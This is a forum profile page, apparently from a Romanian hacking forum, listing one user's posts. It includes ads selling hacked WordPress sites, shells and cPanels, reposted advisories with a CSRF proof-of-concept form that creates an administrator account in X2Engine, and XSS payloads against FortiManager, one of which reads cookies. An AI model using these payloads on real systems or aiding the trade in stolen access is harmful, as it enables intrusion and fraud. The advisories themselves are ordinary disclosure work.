Jump to content


Active Members
  • Posts

  • Joined

  • Last visited


10 Good

About sarmulita

  • Rank
    Registered user
  • Birthday 03/05/1956


  • Interests
  • Occupation

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. [sell] WPs / Shells / Cpanels. PM, for more details.
  2. UP! wordpress / 1 = $0.5, minim 20.
  3. Salut, am intampinat o problema cu un scanner, (e scanenrul lui gio). Am cautat rezolvari, dar nu am gasit nimic care sa ma ajute. Poate ma ajutati voi. File "/usr/lib/python2.7/dist-packages/requests/api.py", line 85, in post File "/usr/lib/python2.7/dist-packages/requests/api.py", line 40, in request File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 229, in request File "/usr/lib/python2.7/dist-packages/requests/models.py", line 646, in send File "/usr/lib/python2.7/dist-packages/requests/models.py", line 323, in _build_response File "/usr/lib/python2.7/dist-packages/requests/models.py", line 622, in send File "/usr/lib/python2.7/dist-packages/requests/packages/urllib3/connectionpool.py", line 384, in urlopen File "/usr/lib/python2.7/dist-packages/requests/packages/urllib3/connectionpool.py", line 261, in _make_request File "/usr/lib/python2.7/httplib.py", line 1034, in getresponse File "/usr/lib/python2.7/httplib.py", line 407, in begin File "/usr/lib/python2.7/httplib.py", line 393, in _read_status <type 'exceptions.TypeError'>: 'NoneType' object is not callable
  4. S-a cam dus acea perioada cu smtp-uri... UP!
  5. Source: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5075/ Details: It was discovered that no protection against Cross-site Request Forgery attacks was implemented, resulting in an attacker being able to able to force the creation of a new administrative account. Impact: Cross-site Request Forgery exploits the way in which HTTP and web browsers work. Due to the fact that HTTP is a stateless protocol, and that web browsers will include all relevant cookies for the domain that a request is for, if an administrator user was logged into the application and the attacker sent a link that the administrator duly followed (or the attacker tricked them into following a link on a page), the administrator’s browser would include all cookies (including the session cookies) in the request. The attacker’s link would then be executed with administrator privileges. This attack is not limited to sending malicious URLs to users; multiple different attack vectors exist to perform this attack in a more covert manner, such as embedding the attack within an invisible iFrame on a different page. Using the iFrame method it is also possible to submit both GET and POST requests. For example: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://localhost/x2engine/index.php/users/create" method="POST"> <input type="hidden" name="User[firstName]" value="John" /> <input type="hidden" name="User[lastName]" value="Smith" /> <input type="hidden" name="User[username]" value="adm1n" /> <input type="hidden" name="User[password]" value="letmein" /> <input type="hidden" name="User[userKey]" value="" /> <input type="hidden" name="User[title]" value="" /> <input type="hidden" name="User[department]" value="" /> <input type="hidden" name="User[officePhone]" value="" /> <input type="hidden" name="User[cellPhone]" value="" /> <input type="hidden" name="User[homePhone]" value="" /> <input type="hidden" name="User[address]" value="" /> <input type="hidden" name="User[backgroundInfo]" value="" /> <input type="hidden" name="User[emailAddress]" value="" /> <input type="hidden" name="User[status]" value="1" /> <input type="hidden" name="yt0" value="Create" /> <input type="submit" value="Submit request" /> </form> </body> </html> Exploit: Exploit code is not required. Remediation: The vendor has released a patch. Vendor status: 15/09/2014 Submitted initial contact via web form on X2Engine’s page 30/09/2014 Second initial contact message sent via web form 08/12/2014 Final chaser sent via their web form 20/01/2015 Automated response from the X2 website received on 08/12/2014. Attempting to contact the email address that it was sent from “john@x2engine.com”. If no response by the end of the week will start forced disclosure process 21/01/2015 Initial vendor response, details over vulnerability sent 26/02/2015 Chaser sent to vendor 17/04/2015 Second chaser sent to vendor 08/06/2015 Chaser sent to vendor. Unsure if his emails are getting through to us as he stated that he has been replying 08/06/2015 Vendor responded stating that they needed vuln details even though I had sent them months ago 09/06/2015 Vendor is approximately 75% through fix and will have a patch out within the next few weeks 26/06/2015 MITRE assigned CVE-2015-5075 13/07/2015 Vendor asked for CVEs to add to their page. Should be ready for publish soon when they have given their clients time to patch 22/07/2015 Email from vendor stating that they released the fix for this on 13/07/2015 and asked when we would be disclosing 23/07/2015 Vendor has asked if we wait off until they release their next major update (At some point in the next 2 weeks). Confirmed this is fine and to contact us when they have a release date confirmed for it 24/08/2015 Replied to the vendor 26/08/2015 Vendor confirmed that they are ready for us to publish 18/09/2015 Published Copyright: Copyright © Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. source
  6. [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FORTIMANAGER-XSS-0924.txt Vendor: ================================ www.fortinet.com Product: ================================ FortiManager v5.2.2 FortiManager is a centralized security management appliance that allows you to centrally manage any number of Fortinet Network Security devices. Vulnerability Type: =================== Multiple Cross Site Scripting ( XSS ) in FortiManager GUI http://www.fortiguard.com/advisory/multiple-xss-vulnerabilities-in-fortimanager-gui CVE Reference: ============== Pending Vulnerability Details: ===================== The Graphical User Interface (GUI) of FortiManager v5.2.2 is vulnerable to two reflected Cross-Site Scripting (XSS) vulnerabilities. 2 potential XSS vectors were identified: * XSS vulnerability in SOMVpnSSLPortalDialog. * XSS vulnerability in FGDMngUpdHistory. The Graphical User Interface (GUI) of FortiManager v5.2.3 is vulnerable to one reflected XSS vulnerability and one stored XSS vulnerability. 2 potential XSS vectors were identified: * XSS vulnerability in sharedjobmanager. * XSS vulnerability in SOMServiceObjDialog. Affected Products XSS items 1-2: FortiManager v5.2.2 or earlier. XSS items 3-4: FortiManager v5.2.3 or earlier. Solutions: =========== No workarounds are currently available. Update to FortiManager v5.2.4. Exploit code(s): =============== 1- Persistent: https://localhost/cgi-bin/module/sharedobjmanager/firewall/SOMServiceObjDialog?devGrpId=18446744073709551615&deviceId=18446744073709551615&vdom=&adomId=3&vdomID=0&adomType=ems&cate=167&prodId=0&key=ALL&catetype=167&cate=167&permit_w=1&roid=189&startIndex=0&results=50 <div class="ui-comments-div"><textarea id="_comp_15" name="_comp_15" class="ui-comments-text" cols="58" maxlength="255" maxnum="255" placeholder="Write a comment" rows="1"><script>alert(666)</script></textarea><label class="ui-comments-remaining"> 2- Reflected https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]\n\n%27%2bdocument.cookie%29%3C/script%3E <https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]%5Cn%5Cn%27%2bdocument.cookie%29%3C/script%3E> Disclosure Timeline: ========================================================= Vendor Notification: August 4, 2015 September 24, 2015 : Public Disclosure Exploitation Technique: ======================= Remote & Local Severity Level: ========================================================= Medium (3) Description: ========================================================== Request Method(s): [+] GET Vulnerable Product: [+] FortiManager v5.2.2 & v5.2.3 or earlier Vulnerable Parameter(s): [+] vdom, textarea field Affected Area(s): [+] sharedobjmanager, SOMServiceObjDialog =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx source
  7. Bun, daca veniti si cu argumente ar fi super
  8. Salut, am deschis acest topic pentru a va cere parerea in legatura cu moneda virtuala BTC. De ce a scazut asa? Sunt sanse sa creasca sau v-a scade iar? Sansa unei investitii profitabile sau un esec in afaceri? Multi si-au pus aceste intrebari. Astept parerile voastre!
  • Create New...